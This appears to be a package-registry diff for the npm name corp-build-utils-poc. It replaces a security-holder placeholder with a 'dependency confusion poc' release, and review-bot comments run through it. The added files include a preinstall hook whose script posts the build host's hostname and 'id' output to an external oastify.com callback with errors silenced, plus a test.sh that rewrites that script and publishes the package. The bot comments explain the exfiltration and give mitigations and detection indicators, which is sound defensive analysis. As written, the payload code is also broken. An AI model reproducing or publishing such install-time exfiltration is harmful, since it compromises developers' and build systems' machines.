corp-build-utils-poc 0.0.1-security → 99.9.12

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.



Binary file
Binary file
Binary file
Binary file
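--- a/package/package.json
+++ b/package/package.json
@@ -1,6 +1,9 @@
 {
 "name": "corp-build-utils-poc",
-"version": "0.0.1-security",
-"description": "security holding package",
-"repository": "npm/security-holder"
+"version": "99.9.12",
+"description": "dependency confusion poc",
+"private": false,
+"scripts": {
+"preinstall": "node preinstall.js"
+}
 }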
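Review bot: The new `scripts.preinstall` hook (`"preinstall": "node preinstall.js"`, line 37) runs arbitrary code on every consumer's `npm install`, and it replaces a registry security-holder placeholder (`0.0.1-security`, `npm/security-holder`) that existed precisely to keep this name inert. Together with the jump to `99.9.12` and the `"dependency confusion poc"` description, the name should be treated as a dependency-confusion indicator rather than a package. On the consumer side, `ignore-scripts=true` in `.npmrc` prevents the hook from running at all, and pinning internal scopes to the private registry (`@scope:registry=<private-registry-url>`) keeps public lookups for internal names from resolving here; on the registry side the security holder should be re-applied.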
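--- a/package/preinstall.js
+++ b/package/preinstall.js
@@ -0,0 +1,24 @@
+const https = require("https");
+
+const payload = JSON.stringify({
+event: "dependency_confusion_executed",
+host: require("os").hostname()
+data: require("os").system('id')
+});
+
+const req = https.request(
+{
+hostname: "usqcwm91ckqp7x1xtohghtpyup0go6cv.oastify.com", // <-- replace with YOUR webhook host
+path: "/webhook", // <-- replace path
+method: "POST",
+headers: {
+"Content-Type": "application/json",
+"Content-Length": payload.length
+}
+},
+() => {}
+);
+
+req.on("error", () => {}); // do not break install
+req.write(payload);
+req.end();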
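Review bot: This install-time hook posts the build host's `os.hostname()` and the output of an `id` command to an external callback host (`usqcwm91ckqp7x1xtohghtpyup0go6cv.oastify.com`, line 66) with both the response callback and the `"error"` handler left empty (line 88) so nothing surfaces to the person running `npm install`; that is exfiltration of build-host identity and has no place in a published package regardless of the "PoC" label. The hostname is an indicator to block at the egress proxy and to search for in build and proxy logs, and the literal `dependency_confusion_executed` in the request body is a usable signature for the same traffic. The identical template is embedded verbatim in `package/test.sh`'s heredoc (lines 106–156), so one indicator match covers both files. As pasted the object literal is not valid JavaScript and `require("os").system` is not a Node API, so the hook appears to throw and fail the install loudly rather than complete silently; a failing preinstall for this package name is therefore itself a detection signal, not a reason to lower the severity.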
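--- a/package/test.sh
+++ b/package/test.sh
@@ -0,0 +1,45 @@
+#!/bin/bash
+set -e
+
+echo "[*] Updating PoC payload..."
+
+cat > preinstall.js <<'EOF'
+const https = require("https");
+
+const payload = JSON.stringify({
+event: "dependency_confusion_executed",
+host: require("os").hostname()
+data: require("os").system('id')
+});
+
+const req = https.request(
+{
+hostname: "usqcwm91ckqp7x1xtohghtpyup0go6cv.oastify.com", // <-- replace with YOUR webhook host
+path: "/webhook", // <-- replace path
+method: "POST",
+headers: {
+"Content-Type": "application/json",
+"Content-Length": payload.length
+}
+},
+() => {}
+);
+
+req.on("error", () => {}); // do not break install
+req.write(payload);
+req.end();
+EOF
+
+echo "[*] Bumping version..."
+npm version patch --no-git-tag-version
+
+NEW_VERSION=$(node -p "require('./package.json').version")
+echo "[+] New version: $NEW_VERSION"
+
+echo "[*] Packing package..."
+npm pack
+
+echo "[*] Publishing to npm..."
+npm publish --access public
+
+echo "[+] Publish complete"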
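--- a/package/README.md
+++ b/package/README.md
@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=corp-build-utils-poc for more information.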